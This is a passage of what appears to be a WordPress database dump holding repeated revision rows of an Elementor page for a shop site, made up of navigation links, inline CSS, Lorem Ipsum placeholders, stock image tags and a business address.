#1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:26:50','2022-09-30 05:56:50','',1373,'https://gopalak.in/?p=1445',0,'revision','',0),(1446,1,'2022-09-30 11:28:46','2022-09-30 05:58:46','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:28:46','2022-09-30 05:58:46','',1373,'https://gopalak.in/?p=1446',0,'revision','',0),(1447,1,'2022-09-30 11:28:46','2022-09-30 05:58:46','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:28:46','2022-09-30 05:58:46','',1373,'https://gopalak.in/?p=1447',0,'revision','',0),(1448,1,'2022-09-30 11:28:46','2022-09-30 05:58:46','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:28:46','2022-09-30 05:58:46','',1373,'https://gopalak.in/?p=1448',0,'revision','',0),(1449,1,'2022-09-30 11:29:14','2022-09-30 05:59:14','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:29:14','2022-09-30 05:59:14','',1373,'https://gopalak.in/?p=1449',0,'revision','',0),(1450,1,'2022-09-30 11:29:14','2022-09-30 05:59:14','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 